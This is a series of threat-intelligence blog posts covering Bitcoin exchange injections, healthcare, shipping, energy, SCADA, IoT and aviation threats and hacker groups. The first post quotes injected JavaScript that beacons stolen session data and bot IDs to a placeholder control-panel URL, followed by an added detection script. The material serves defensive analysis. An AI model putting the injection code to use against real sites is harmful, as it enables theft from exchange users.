Bitcoin Exchange Script Injection Vulnerability

Written by Assaf Keren

It is no secret that Bitcoin is under a lot of scrutiny lately.

From publicized breaches of Bitcoin trading sites to wild fluctuations in its value, the virtual currency that was considered a hot commodity until very recently is floundering. Perhaps the most alarming story demonstrating the instability of this currency is Mount Gox, once the largest Bitcoin exchange in the world. The site first closed, then filed for bankruptcy, and its CEO’s Twitter account was hacked. With all this controversy, the public is left wondering about the future of Bitcoin and the level of security the exchange sites provide. Naturally, hackers have also taken notice and have started looking for breaches on other Bitcoin exchange sites. Alongside the flurry of phishing emails, Bitcoin mining bots and attempts to hack into Bitcoin exchange sites, there is a new trend: utilizing the ability of Trojans to hijack HTTP sessions, or plain old XSS and CSRF attacks, the attackers inject site-specific code into users’ sessions, then scan for available funds in the user accounts and steal money from them.

Recently, our analysts have come upon four different injection codes, three for Bitcoin exchanges and one for a betting site. All of these are fashioned in the same way, and are clearly written by the same author.

Below is an excerpt from one of the injections:

S:function(data){
    var s = document.createElement('script');
    s.type = 'text/javascript';
    s.async = false;
    s.src = "{HERE_ADMIN_URL}/?s=bitcoin&v=2&m=%BOTNET%&b=%BOTID%&t="+data+"&rnd="+Math.random();
    s.onerror = s.onload = s.onreadystatechange = function(){
        if(!this.loaded && (!this.readyState || this.readyState == 'loaded' || this.readyState == 'complete')){
            this.onerror = this.onload = this.onreadystatechange = null;
        }
    }
    if(document.getElementsByTagName('head').length){ document.getElementsByTagName('head')[0].appendChild(s); }else{ document.appendChild(s); }
}

In the continuation of the code, the attackers change the CSS settings of the site, and replace the values of the send-to-address, send-value and send button elements. All in all, this is a very simple and elegant piece of code that utilizes the context in which it is run.
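A defender-side counterpart to the excerpt, as an added example that is not part of the original post: it classifies script URLs by origin and by the query shape of the loader above, and compares the withdrawal fields the user typed with the values about to be submitted. The allowlisted origins, the form id `withdraw-form`, the field ids and the sample URLs are hypothetical placeholders.

```javascript
// Added example, not code from the original post. Origins, element ids and
// sample URLs are hypothetical placeholders for an exchange's own values.
const ALLOWED_SCRIPT_ORIGINS = new Set([
  'https://exchange.example',
  'https://static.exchange.example',
]);

// Query keys carried by the loader excerpt above (m, b, t, rnd).
const BEACON_KEYS = ['m', 'b', 't', 'rnd'];

// Classify one script URL as it appears in the DOM.
function classifyScriptSrc(src, pageUrl) {
  if (!src) return { verdict: 'inline', reasons: [] }; // no src: not judged here
  let url;
  try {
    url = new URL(src, pageUrl); // resolves relative paths against the page
  } catch (e) {
    return { verdict: 'suspicious', reasons: ['unparseable-src'] };
  }
  const reasons = [];
  if (!ALLOWED_SCRIPT_ORIGINS.has(url.origin)) reasons.push('origin-not-allowlisted');
  if (BEACON_KEYS.every((k) => url.searchParams.has(k))) reasons.push('beacon-shaped-query');
  return { verdict: reasons.length ? 'suspicious' : 'ok', reasons };
}

// Run the classifier over a list of script URLs and keep the suspicious ones.
function auditScripts(srcs, pageUrl) {
  return srcs
    .map((src) => ({ src, ...classifyScriptSrc(src, pageUrl) }))
    .filter((r) => r.verdict === 'suspicious');
}

// Compare what the user entered (recorded from trusted input events) with
// what the form is about to send. Returns the names of fields that differ.
function findTamperedFields(typed, submitted) {
  return Object.keys(submitted).filter((name) => typed[name] !== submitted[name]);
}

// Browser wiring: watch for added <script> elements and for field values
// that changed without a trusted (user-generated) input event.
function installGuards(doc, report) {
  const form = doc.getElementById('withdraw-form');
  if (!form) return;
  const fields = ['send-to-address', 'send-value']
    .map((id) => doc.getElementById(id))
    .filter(Boolean);
  const typed = {};
  fields.forEach((f) => {
    typed[f.id] = f.value; // server-rendered value at install time
    f.addEventListener('input', (ev) => {
      if (ev.isTrusted) typed[f.id] = f.value;
    });
  });
  form.addEventListener('submit', (ev) => {
    const submitted = {};
    fields.forEach((f) => { submitted[f.id] = f.value; });
    const tampered = findTamperedFields(typed, submitted);
    if (tampered.length) {
      ev.preventDefault();
      report({ kind: 'field-tamper', fields: tampered });
    }
  }, true);
  new MutationObserver((records) => {
    for (const rec of records) {
      for (const node of rec.addedNodes) {
        if (node.nodeName !== 'SCRIPT') continue;
        const result = classifyScriptSrc(node.src, doc.location.href);
        if (result.verdict === 'suspicious') {
          report({ kind: 'script', src: node.src, reasons: result.reasons });
        }
      }
    }
  }).observe(doc.documentElement, { childList: true, subtree: true });
}

// Constructed sample: script URLs as they might appear in a DOM snapshot.
const SAMPLE_SRCS = [
  '/js/app.js',
  'https://static.exchange.example/js/wallet.js?v=3',
  'https://panel.invalid/?s=bitcoin&v=2&m=net1&b=bot7&t=abc&rnd=0.42',
];

if (typeof document !== 'undefined') {
  installGuards(document, (finding) => console.warn('integrity finding', finding));
}
```

Because the injected code runs in the same page, it can interfere with these checks, so the findings are a detection signal to be paired with server-side controls.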

This is not a new method of attack – it has been widely used in the past and probably will continue to be used in the future. However, it demands a good understanding of how the exchanges work and how they fashion their web services and it is very version-specific. To the exchanges, however, this is bad news since this targeting of the users is something that they have a limited capability to defend against (unlike attacks on their servers).

The process that the exchanges are going through is very similar to what banks and e-commerce services went through when they started providing Internet services. The problem is that banks have the ability, staff and resources (and insurance) to limit transactions and work with customers on fraud cases, while Bitcoin exchanges do not have that kind of capability yet. Even if a specific attack is stopped, we will probably see more and more attacks on Bitcoin (and other currencies) users. This is just one more step in the evolution of crypto-currency to a more mature state.

Cyber Threats to the Healthcare Industry

Written by Gal Landesman

Introduction

The healthcare industry is advancing rapidly, linking systems and medical devices to the Internet, adopting electronic health records and implementing regulatory reforms. Tremendous technological advancements in the medical industry bring with them a greater reliance on software-controlled devices and wireless technologies. These technologies are used in any visit to the doctor and in hospital wards. Many of them connect or have the capability to connect to the Internet. Alongside the opportunities presented, the industry is also a major target for cyberattack, mostly for financial motivation. In the following post, we will present some of the cyber threats currently faced by the healthcare industry.

In today’s environment, organizations are required to take responsibility for securing their networks and computers. Alarming vulnerabilities in medical devices have caused the FDA to issue guidelines for cyber security of the medical device industry. The U.S. Health Information Technology for Economic and Clinical Health Act, for example, permits the fining of hospitals and other organizations up to $1.5 million a year for serious security incidents. Unfortunately, the industry is falling short of complying with said security standards. Last year, for example, the U.S. Department of Health and Human Services’ Office for Civil Rights (OCR) performed a random audit of 20 healthcare organizations, 19 of which failed.

(Note – this blog post is an excerpt from our report: “Cyber Threats to the Healthcare Industry”. If you are interested in receiving the full report, please write to: info@sensecy.com).

Threats to the Healthcare Industry

According to security experts, cyber criminals are shifting their focus from the financial industry to the healthcare industry, today an easier and more profitable target. Healthcare records contain valuable information for cyber criminals, such as social security numbers and personal information. Credit card records sell for an average of $2, while medical records can fetch about $20 on the black market. According to the Experian 2014 Data Breach Industry Forecast, the healthcare industry is likely to make the most breach headlines in 2014, despite the fact that 2013 was a year of mega-breaches in the healthcare industry.

Hackers’ ransom note, after breaking into a Virginia government website

Identity and Information Theft

Medical identity theft occurs when someone uses an individual’s name and personal identity to fraudulently receive medical services, prescription drugs and goods, or attempts to commit fraudulent billing. Information theft can include the theft of personal information for malicious use, such as selling it on the DarkNet. According to a Ponemon Institute 2013 survey, medical identity theft claimed more than 1.84 million U.S. victims in 2013. Medical identity theft is on the rise in the U.S., where the number of victims in 2013 increased by 19%.

Medical Device Breaching

Over the last 15 years, a growing number of medical devices have become interconnected through hospital networks, the Internet, smartphones and other devices, increasing their vulnerability. This has not escaped the attention of the FDA, which recently issued new guidelines to biomedical engineers, healthcare IT and procurement staff, medical device user facilities, hospitals and medical device manufacturers.

The new FDA guidelines came in response to the 2012 findings of a governmental panel that revealed that computerized hospital equipment is increasingly vulnerable to malware infection that can potentially render these devices temporarily inoperable. Many of the devices run on Windows variants. They are interconnected through internal networks to the Internet and are also exposed to laptops in the hospitals, making them vulnerable to malware.

An example of the implications that could be caused by such systems was demonstrated by the medical-device panel from the NIST Information Security & Privacy Advisory Board, who described fetal monitors in intensive-care wards that were slowed down due to malware infection. This problem can affect a wide range of devices, such as compounders, diagnostic equipment, etc.

A report issued by the Government Accountability Office (GAO) warned mostly about vulnerabilities found in wireless implanted defibrillators and insulin pumps, but thousands of other network-connected life-saving devices are also vulnerable. Malware in medical devices is probably much more prevalent than we know, since most of it is not reported to the regulators and there are no records. The OS updating process for medical devices is an onerous regulatory process.

Cyber threats to medical devices (from the GAO report)

Conclusion

We believe that the healthcare industry is facing major threats from cyberspace. These threats encompass large areas of the industry and may become a greater burden for it, compromising patient safety, and causing financial and commercial damage to the associated bodies.

RedHack – A Turkish Delight

On February 4, 2014, it was reported that members of the RedHack group hacked into the systems of three major telecoms companies: TTNET (Turkey’s largest ISP), Vodafone and Turkcell (the leading mobile phone operator of Turkey). The hackers claim to have obtained large amounts of data, and thus far they have published online information that belongs to Turkish officials and government employees, including names, ID numbers, phone numbers, email addresses and more.

RedHack is a Turkish Marxist–Leninist computer hacker group founded in 1997. The group has claimed responsibility for hacking institutions that include the Council of Higher Education, the Turkish police force, the Turkish Army, Türk Telekom, and the National Intelligence Organization. The group’s core numbers are said to be 12 but the group has hundreds of supporters and over 700,000 followers on Twitter.

RedHack’s official Twitter account

RedHack first made a name for themselves by hacking the Ankara Police Department’s official site in 2012, and later launched a number of attacks against governmental websites, including the Finance and Interior ministries, as well as the Religious Affairs Directorate.

During the last month the group has waged several high-profile attacks against Turkish entities: On January 16, 2014, the group leaked the phone numbers of over 4,000 people who work for Turkcell; On January 15, members of RedHack breached the systems of the General Directorate of the EGO, which serves as the Public Transports Department in Ankara. On January 11, hackers from the group waged several cyber attacks against a number of Turkish organizations, such as the Parliament, the Turkish State Railways, and the Justice and Development Party (AKP).

We believe that in the near future RedHack will continue to focus on attacking official Turkish entities. An interesting observation is their shift from defacing governmental websites to breaching major organizational systems and leaking sensitive information.

Cyber Threats to the Shipping Industry

Introduction

Several cyber threats pertaining to the shipping industry have been reported of late, illustrating the vulnerability of this industry – a fact that cyber criminals, terrorists and even hacktivists are already exploiting.

(Please note – this blog post is an excerpt from our report: “Cyber Threats to the Shipping Industry”. If you are interested in receiving the full report please write to: info@sensecy.com).

Vulnerabilities of Automatic Identification System Exposed

Researchers at the Trend Micro security firm reported they had identified major security breaches in the Automatic Identification System (AIS). The AIS is a global system that identifies and tracks vessels in real time. The system periodically transmits the position, speed and heading of a vessel, among other information. It was mandated by the International Maritime Organization (IMO) in all passenger and commercial vessels over 300 metric tons. During an experiment, the researchers managed to break into the system and alter data in real time.

The researchers were able to spoof the route of a vessel to spell “PWNED”, meaning “hacked”

The breach was carried out in two phases. First, they identified the main AIS Internet providers that collect and distribute AIS information, and exploited their vulnerabilities to manipulate data:

  • Modification of all ship details such as position, course, cargo, flag, speed, name, MMSI (Mobile Maritime Service Identity) status, etc.
  • Creation of fake vessels with the same details, e.g. having an Iranian vessel with nuclear cargo show up off the coast of the U.S.

In the second phase, they exploited flaws in the AIS communication protocol mandatory in hardware transceivers in all vessels. Using a US$200 transceiver (using Marine VHF channels 161.975 MHz and 162.025 MHz) they were able to:

  • Permanently disable the AIS system on a vessel, forcing the ship to stop communicating its position, and also stop receiving AIS notifications from all vessels in the vicinity.
  • Issue a fake CPA alert (Closest Point of Approach) and trigger a collision warning alert.
  • Fake a “man-in-the-water” distress beacon at any location that would also trigger alarms on all nearby vessels.
  • Send false weather information to a vessel, e.g. storm approaching, to route around.
  • Cause all ships to transmit AIS traffic much more frequently than normal, flooding the channel and blocking communications from marine authorities and other vessels in range.

This security breach allows hostile entities to alter the real-time data of vessels sailing the seas, with the potential to cause economic damage, in addition to the serious safety risks to vessels or sabotaging the activities of marine enforcement agencies (police, coastguard etc.). The security gap is particularly worrisome because it does not require expensive equipment or impressive hacking capabilities to utilize it. The threat is that terrorist organizations could exploit this vulnerability, which could lead to serious physical consequences and even the paralysis of maritime traffic in a particular area.

Cyber Attack Breaches Port Security; Container Hijacked

On October 16, 2013, Europol announced it had exposed a network of drug traffickers who recruited hackers to breach IT systems in the port of Antwerp, Belgium. The purpose of the breach was to allow hackers to access secure data giving them the location and security details of containers (that contained smuggled drugs worth billions of dollars), allowing the traffickers to send in truck drivers to steal the cargo before the legitimate owner arrived.

The operation (which took place over a two-year period) went undetected by the port authorities and shipping companies involved. It was apparently uncovered with the recent arrests of members of the “Silk Road” website who sold drugs on the DarkNet in the U.S. The investigation was carried out by a team from Europol that in a related series of raids managed to confiscate containers holding cocaine and heroin worth hundreds of millions of dollars.

KVM devices used in the Antwerp attack

The breach of the port and shipping companies’ computer systems began with a spear-phishing attack, i.e. sending innocent-looking emails with malicious contents to employees of transportation companies working in the port of Antwerp. When the ring members saw that this channel had become blocked by enhanced IT security, they physically broke into the companies’ offices and installed KVM (keyboard, video and mouse) switches to enable remote access to the computer systems. The KVM switches were assembled and prepared in a professional manner and included miniature PCs concealed inside electrical power strips, external hard drives, as well as keyloggers disguised as USB keyboard port converters. Although some of this equipment was designed simply to steal login credentials, the hackers appear to have used wireless cards to study and possibly control the logistics systems in real time. The group then sent its drivers to the port and provided them with all the necessary certificates and release codes to retrieve the containers.

Cyber Threats to Oil and Gas Industry

Recent years have witnessed an increase in the number of cyber attacks against the energy sector. This sector’s main vulnerability is its reliance on ICS/SCADA systems, which have been causing serious concern for the security community for the past years.

The oil and gas industry is considered a privileged target for different adversaries such as nation-state actors, cyber terrorists, hacktivists and even cyber criminals that sell stolen sensitive data in the underground market. In 2012, for example, energy companies were targeted in 41% of the malware-attack cases reported to the US Department of Homeland Security (DHS). And vulnerabilities in this industry have skyrocketed 600% since 2010, according to data reported in an NSS Labs’ Vulnerability Threat Report.

Here are some examples of significant attacks pertaining to the energy sector:

State-Sponsored

In August 2012, Saudi Aramco was hit by a computer virus that wiped data from 30,000 computers. Although the attack did not have an impact on oil production, it disrupted Saudi Aramco’s internal communications. The virus, termed ‘Shamoon’, was inserted into the company’s network via a USB stick. The US government has blamed Iran for the attack, and the Secretary of Defense Leon Panetta stated that it was “probably the most destructive attack that the private sector has seen to date”.

Hacktivism

On June 20, 2013, the hacktivist collective Anonymous launched a cyber operation dubbed #OpPetrol planned to target various oil companies around the world. The operation was not a success, but it emphasized the fact that the oil and gas industry represents an attractive target for attackers with different agendas and motivations, including sabotage, cyber espionage, financial, political, and more.

Terrorist Groups

In Tunisia the hacker group Tunisian Cyber Army (TCA) is joining forces with the Electronic Army of al-Qaeda (AQEA). The groups had already carried out cyber attacks against Western targets and they definitely pose an emerging threat in the cyber domain.

Conclusion

We believe that the threat to the oil and gas industry will grow in the near future, as the hunt for vulnerabilities in SCADA systems has increased. A couple of weeks ago it was reported that Kaspersky experts discovered a Java version of the Icefog espionage campaign that targeted at least three US oil and gas companies. According to Symantec, the energy sector was the second most targeted vertical in the last six months of 2012, with only the government/public sector exceeding it with 25.4 percent of all attacks. With millions of threats of varying complexity experienced by the industry on a weekly basis, it is not surprising that by 2018 the oil and gas industry will be spending up to $1.87 billion on cyber security.

Targeting SCADA Systems

Introduction

Recent years have witnessed an increased awareness within the worldwide security community of risks related to cyber attacks against critical infrastructures. ICS/SCADA systems have been a particular cause of concern for the security community, owing to Stuxnet, Flame and other cyber threats. As automation continues to evolve and assumes a more important role worldwide, the use of ICS/SCADA systems is likely to increase accordingly.

In this post I would like to present an analysis of several cyber incidents pertaining to ICS/SCADA systems and originating from threat elements in the Middle East.

Iranian Hacker Group Implicates itself in Physical Attack on Electric Power Facility

On January 2, 2014, the Cryptome.org website (a digital library host) published a message from the Iranian hacker group Parastoo, directed at the American authorities. The message headline connects the group to a “military-style” attack on an electric power station, the PG&E Metcalf substation, in California, U.S.A. on April 16, 2013. The connection to the Iranian group is unclear, despite the fact that Parastoo has mentioned that it has been testing national critical infrastructures using cyber vectors.

Cryptome message

On April 16, 2013, an undetermined number of individuals breached the PG&E Metcalf power substation in California and cut the fiber-optic cables in the area around the station. The act neutralized some local 911 services and temporarily disrupted cell phone service in the area. The perpetrators also fired shots from high-powered rifles at several transformers in the facility. Ten were damaged and several others shut down.

It should be noted that there have been several attacks against different infrastructure facilities in the U.S. in the past year, such as the Arkansas power grid. Furthermore, officials conceded that the electric power industry is focusing on the threat of cyber attacks.

About Parastoo

The Iranian hacker group Parastoo first emerged on November 25, 2012, when they posted a message announcing they hacked into the International Atomic Energy Agency (IAEA) and leaked personal details of its officials. In February 2013, Parastoo claimed to have stolen nuclear information, credit card information, and the personal identities of thousands of customers, including individuals associated with the U.S. military, that work with IHS Inc., a global information and analytics provider.

The Syrian Electronic Army Hacks into Israeli SCADA Systems

On May 6, 2013, the cryptome.org website reported a successful attack by the “Syrian Electronic Army” (SEA) on a strategic Israeli infrastructure system in Haifa. In an email sent to the website, the attack was declared to be a warning to decision-makers in Israel, evoking alleged Israeli Air Force (IAF) attacks on Syrian territory at the beginning of May 2013. The claim of responsibility for the attack was accompanied by a .pdf file with screenshots substantiating the cyber attack.

Examination of the screenshots proved that the attack was authentic, but was not aimed at a Critical National Infrastructure (CNI) like the municipal water SCADA system in Haifa. Our research did, however, reveal that the attackers had targeted the irrigation control system of Kibbutz Sa’ar, near Nahariya. Control of this system would present the hacker with numerous capabilities, among which is the destruction of the agricultural yield.

Screenshot from the PDF released by the attackers

We also noticed that the time shown on the screenshot indicated the end of April 2012. It is possible that the system clock was incorrectly set, but it is more likely that the system was breached a year ago and the published “Retaliatory Strike” was retained as a contingency plan for exactly such an attack by Israel.

The Syrian Electronic Army posted a denial via its Twitter account, where it stated that it was not behind the attack. On other occasions, this Twitter account has been used as a platform for claims of responsibility, but with this incident, the above attack is not mentioned, neither here nor on the group’s official website or forums (apart from the denial). It should be noted that there are numerous examples of fictitious claims of responsibility intended to deflect identification of the attacker MO (Modus Operandi) of state-sponsored hacker groups.

SEA denial on their Twitter account

This incident is another link in a chain of events demonstrating an impressive ability to locate and exploit SCADA systems that appear to be susceptible to the Muslim hackers’ skills. However, in our view, this event is unprecedented. For the first time in public, a critical computerized infrastructure facility on Israeli soil has been attacked, and it is extremely likely that a sovereign state is behind the attack, declaring outright war in the cyber arena and deviating from the intelligence-gathering plateau.

Jihadist Cyber Terror Group to Target SCADA Systems

On June 11, 2011, a prominent Web Jihadist from the Shumukh al-Islam forum, Yaman Mukhaddab, launched a campaign to recruit male and female volunteers for a new Electronic Jihad group. The campaign, which takes place over the thread itself, begins with a clear definition of the group’s tasks and priorities. Mukhaddab says:

Simply put, it is a cyber-terror base, for launching electronic terror attacks on major infidel powers, specifically the U.S., the U.K. and France, no others. This base is not going to attack, for instance, the sites of Shi’a, Christians, apostates, slanderers, liar sites and forums or anything else. I repeat: it will only target the U.S., the U.K. and France.

Mukhaddab goes on to list the main targets for future attacks. SCADA systems are ranked as a top priority target, in order to “destroy power, water and gas supply lines, airports, railway stations, underground train stations, as well as central command and control systems” in these three countries. The second priority includes control systems of general financial sites, such as central savings organizations, stock markets and major banks. Third on the group’s agenda are websites and databases of major corporations dominating the economies of these countries, while fourth and last are less specified “public sites affecting the daily routine of citizens, in order to maximize the terror effects on the population”.

Mukhaddab details the desired skills of anyone wishing to join the group, including: thorough understanding of SCADA systems, preferably with experience in hacking them; acquaintance with writing hacking programs and scripts, and programming in C, C+ and C++ languages; expertise in networks, communication protocols and various kinds of routers and firewalls, specifically mentioning CISCO; expertise in Linux or Unix operating systems; expertise in Windows operating system; capability of detecting security vulnerabilities; acquaintance with hacker websites, capability of entering them easily, searching for required scripts, tools, or software, and providing them to fellow members, if asked to; complete mastery of English or French scientific language, and scientific background in computer engineering; mastery of the Russian language; and mastery of the Chinese language. Members who want to volunteer are asked to post a response in the thread, specifying the categories that fit their capabilities.

To date, close to a hundred volunteers have already signed on to Mukhaddab’s Electronic Jihad group. We have yet to see indications that this newly formed group has started to engage in online hacking activity, but given the enthusiasm it created among forum members, this is likely to occur in the near future.

Cyber Security – Not Just Another Buzzword

The technology industry loves buzzwords, and its offspring, the IT industry, is no different: “Cloud computing”, “Big data”, “Analytics”, “XX-As-a-Service (XaaS)”… it seems that some marketing wizard invents a new phrase and almost instantly the industry adopts it and uses it to such an extent that within months it has become a trend, and everybody follows suit, adapting their offerings accordingly. Then comes the day when somebody else invents a new, sexier phrase, and everything shifts again. Most of the time it is hard to assess whether the new trend is actually meaningful as such and will establish itself as mainstream or even core of technology, or is it simply being delighted in as a novelty, soon to be forgotten? The side effect of this cycle is that people in the industry are tiring of buzzwords and are becoming more and more skeptical when “The new, innovative concept” is marketed to them. The general public is even less interested – most only care about new technologies and concepts when they have been proven and incorporated into fully productized gadgets and applications.

And now, following the widely publicized breaches of large retail chains, everyone is talking about Cyber Security, and the question arises – is this just one more buzzword?  Not at all, but some mistake it to be so, for several reasons.

First of all, although it appears to be a very young industry, cyber security is not new at all. In fact, it has been incorporated into our lives for over two decades, but under different names – information security, anti-virus etc.

Secondly, it is not a single-faceted industry but a very diverse one comprising older segments – encryption, anti-virus, firewall etc., as well as newer ones: mobile, biometric identification and intelligence.

Although many startups are developing new products, the market as a whole is mature and profitable. The general notion is that cyber companies are run by 20-something-year-olds in their garages, while in fact the young enterprises are fully seeded companies with solid business plans, and the larger companies are huge multinationals (and since the market is consolidating, there are now fewer but much larger players).

So why is it that this vast industry appears so young that it can be mistaken for a passing trend?

In absolute terms, it is relatively young – established in the 1980’s (although by technology standards it can be considered old, much older than the mobile or cloud technologies that it protects today). Also, up until the latest “rebranding”, it was not something most people noticed. IT security sounds boring, and because everything functioned smoothly, no-one worried about how the encryption worked or how viruses were stopped. Fast-forward to today and every news item seems to be entangled in cyber: Snowden and the NSA, the Adobe breach, the Target breach, the international arms race between the U.S., China and Russia – all involve cyber. And since the adoption of Internet and mobile technology, we are all much more exposed to the threat emanating from this world – be it the theft of our personal details or the monitoring of our online activities by various entities. And here’s the good part – the industry is not idle. In fact, it acknowledges the need to evolve to mitigate evolving threats and it is doing so at an extremely rapid pace, trying to come up with solutions for securing things that were not even dreamed of when the first anti-virus was developed. So no, this whole “Cyber” thing is definitely not just another trend. It is here to stay and will accompany us for many years to come. And that is a good thing – since the cybercriminals of the world are DEFINITELY here to stay.

Will Your Toaster Attack You?

Lately, we have been hearing an awful lot about the Internet of Things (IoT).

What this buzzword describes is a world where every device is connected to the Web and communicates with other devices, and us humans, usually via Smartphone interface.

And, to a certain extent, this is an everyday reality, even today – smart TVs, printers, thermostats, and other home appliances are connected to the Web via wireless communication and receive orders from their owners who are often miles away. And, sure enough, this trend has not been overlooked by hackers.

Since each such device now has a unique IP address, Internet connectivity and the ability to send and receive packets of information, hackers can (in theory) connect to them, infect them with malware and use them to send traffic – basically anything that can be performed with a regular PC. Evidence that such schemes are being planned and implemented is growing rapidly.

Security research firm Proofpoint recently announced that they discovered that hackers broke into more than 100,000 gadgets – including TVs, multimedia centers, routers, and at least one fridge – and used the appliances to send out more than 750,000 malicious emails between December 23, 2013 and January 6, 2014 (I guess asking for a Smart TV for Christmas wasn’t such a good idea after all…).

So, while the (now-growing) popular belief that such appliances can be hacked, tinkered with and turned into malicious machines attacking their human masters is not true, it is very likely that they will be used for all kinds of cyber crime, from sending spam and spreading malicious files to participating in DDoS attacks (these are, after all, robots).

Will these appliances attack you anytime soon?

Even more interesting are the discussions on various communication platforms regarding the possibilities presented by this trend. References to the above incident were found in Arab media and also on the Facebook page of the famous “Alkrsan” hacker forum. The latter may indicate a rising interest among Arab hackers for this method of cyber-attack.

Reference to IoT hacking on the famous hacker forum “Alkrsan”

As for the Russian-speaking Internet, the HabrHabr computer blog published a post entitled “a botnet consisting of ‘smart’ TVs, media centers, PCs and … refrigerators was discovered”.

Generally, news sites refer to this affair as an evolving new threat in the cyber world and lively discussions are being held on closed forums regarding the trend.

Russian computer blog HabrHabr discusses IoT hacking

So, will your toaster turn against you anytime soon? Not likely. But we have every reason to believe that any device that can be hacked is a legitimate target for hackers and will be breached sooner or later, changing the “Internet of Things” into the “Internet of Vulnerabilities”.

Cyber Threats to the Aviation Industry

The aviation industry faces major risks on all of its fronts: from the air traffic control systems, to the aircraft themselves, to the airline companies and airports and border crossings. The identified threats stem from the current nature of aviation industry systems, which are interconnected and interdependent.

(Please note – this blog post is an excerpt from our report: “Cyber Threats to the Aviation Industry”. If you are interested in receiving the full report please write to: info@sensecy.com)

On August 13, 2013, the AIAA officially released a Decision Paper entitled “A Framework for Aviation Cyber security”, outlining existing and evolving cyber threats to the commercial aviation enterprise and noting the lack of international agreement on cyber security in aviation. There is no common overall coordination of efforts seeking a global solution.

According to the report, the global aviation system is a potential target for a large-scale cyber attack with attackers focusing on malicious intent, information theft, profit, “hacktivism”, nation states, etc.


The risks are not only theoretical. As the examples below show, some of the aforementioned security concerns have already been realized by hackers in real life.

  • A presentation at the ‘Hack in The Box’ security summit in Amsterdam in April 2013 demonstrated that it is possible to take control of an aircraft’s flight systems and communications using an Android smartphone.
  • Sykipot is a tool that serves as a backdoor that an attacker can use to execute commands on the affected system. It is being used to gather intelligence about the civil aviation sector in the U.S. Like most targeted attacks, Sykipot infects using spear-phishing techniques by sending emails with malicious attachments. Lately, as identified by Trend Micro, Sykipot has been observed gathering intelligence on the U.S. civil aviation sector. The intentions of this campaign are unclear as yet. Sykipot has a history of targeting the U.S. Defense Industrial Base (DIB) and key industries over the past six years.
  • Conficker, a worm that has infected millions of computers worldwide, infected the French Navy network in 2009, forcing it to cut connectivity to stop it from spreading, and to ground its Rafale fighter jets. It was probably introduced through an infected USB drive.
  • In 2008, Spanair flight 5022 crashed just after take-off, killing 154 people. According to the Spanish government’s Civil Aviation Accident and Incident Investigation Commission (CIAIAC), the disaster occurred because the central computer system used for monitoring technical problems in the aircraft was infected with a Trojan horse.
  • In 2008, the FAA reported that the computer network in the Boeing 787 Dreamliner’s passenger compartment was connected to the aircraft’s control, navigation and communication systems – a cause for grave security concern. This connection renders the plane control system vulnerable to cyber attack. Boeing advised that they would address the issue.
Aviation sector under threat of cyber attacks

We believe that the aviation industry is facing major threats from cyberspace and these threats encompass large areas of the industry and may become a greater burden for it, compromising the safety of the passengers, and causing financial and commercial damage to the associated companies.

What Does “Cyber Intelligence” Mean, And Why Is It Needed?

Hi All,

SenseCy Blog has been up and running for a week now and we are extremely happy with the traction we’ve achieved so far.

It’s time to elaborate on what we mean when we say “Cyber intelligence”.

As far as cyber defense goes, organizations have traditionally relied on technology and procedures to mitigate cyber threats.

But as recent events show, this thinking is no longer valid. Without knowing what threats are out there, and who is targeting them, organizations find it impossible to tweak their defensive mechanism and procedures and fail time and again to secure their data from breaches.

So what attributes must one look for in cyber intelligence services?

  • Up-to-date intelligence needs to be on-time, relevant and accurate, based on the needs of a specific organization.
  • Derived from research sources, including Deep Web, open-source, closed groups and password-protected forums (this is where the real information resides), covering multiple languages.
  • A mixture of both technical and operational intelligence (not just “Another variant of malware was detected”).
  • “Analyst approved” intelligence, meaning that information has been correlated, aggregated and analyzed, leading to near-zero false positives.
  • Has operational value – the “What do I do next?” question is answered.
Example of operational intelligence derived from password-protected groups

With such intelligence at its disposal, the organization could better mitigate evolving threats and achieve much greater efficiency and effectiveness from its technology.  

In future posts, we will explore the production and analysis aspects of Cyber Intelligence and show some real-life examples of our work.

Keep in touch!

The SenseCy Team